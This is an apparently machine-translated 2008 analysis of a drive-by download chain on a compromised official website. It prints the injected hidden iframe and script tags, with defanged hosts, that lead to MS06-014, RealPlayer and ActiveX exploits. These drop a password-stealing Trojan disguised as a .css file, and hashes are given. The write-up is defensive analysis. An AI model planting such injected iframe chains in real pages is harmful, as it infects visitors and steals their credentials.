An official website Trojan Trojan-PSW.Win32.OnLineGames.sbg
EndurerOriginal
2008-02-291Version
1. The website homepage contains code:
/---
<IFRAME src = hxxp: // pop **. I ** Ms ** E *. CC/g3.htm width = 100 Height = 0> </iframe>
---/
1.1 hxxp: // pop **. I ** Ms ** E *. CC/g3.htm contains the Code:
/---
<IFRAME src?news.html width = 100 Height = 0> </iframe>
---/
1.1.1 hxxp: // pop **. I ** Ms ** E *. CC/news.html output code:
/---
<SCRIPT src = hxxp: // X ** x * X. c ** Ka ** BC *. Net/ms06014.js> </SCRIPT>
<IFRAME Style = display: None src = "hxxp: // X ** x * X. c ** Ka ** BC *. Net/glworld.html"> </iframe>
<IFRAME Style = display: None src = "hxxp: // X ** x * X. c ** Ka ** BC *. Net/stormii.html"> </iframe>
<Script language = "JavaScript" src = hxxp: // X ** x * X. c ** Ka ** BC *. Net/real. js> </SCRIPT>
<IFRAME Style = display: None src = "hxxp: // X ** x * X. c ** Ka ** BC *. Net/thunder.html"> </iframe>
---/
1.1.1.1 hxxp: // X ** x * X. c ** Ka ** BC *. Net/ms06014.js
Download hxxp: // user ** 1 *. 1 ** A2B ** 3C * 0.net/bak.css with MS06-014 Vulnerability
Bak.css is actually an executable file in PE format
File Description: D:/test/bak.css
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time: 12:15:49
Size: 11504 bytes, 11.240 KB
MD5: 17de1eca74664e197a5614762d072b19
Sha1: 56ec3173d9c98552628e3c24688f520b450ac610
CRC32: ee46ca17
Kaspersky has detected: Trojan program Trojan-PSW.Win32.OnLineGames.sbg file: D:/test/bak.css/pe_patch/upack
The report of Rising Star is Trojan. win32.undef. dkp.
1.1.1.2 hxxp: // X ** x * X. c ** Ka ** BC *. Net/glworld.html
Use the ActiveX control (hangameplugincn18.dll, CLSID: 61f5c358-60fb-4a23-a312-d2b556620f20) installed in the main program glworld to download hxxp: // user ** 1 *. 1 ** A2B ** 3C * 0.net/bak.css
1.1.1.3 hxxp: // X ** x * X. c ** Ka ** BC *. Net/stormii.html
Download hxxp: // user ** 1 *. 1 ** A2B ** 3C * 0.net/bak.css
1.1.1.4 hxxp: // X ** x * X. c ** Ka ** BC *. Net/real. js
Use the RealPlayer vulnerability to download hxxp: // user ** 1 *. 1 ** A2B ** 3C * 0.net/bak.css
1.1.1.5 hxxp: // X ** x * X. c ** Ka ** BC *. Net/thunder.html
Blank content
1.1.1.6 use baidubar. tool to download hxxp: // X ** x * X. c ** Ka ** BC *. Net/Baidu. Cab
Baidu.exe in Baidu. Cab is the same as bak.css.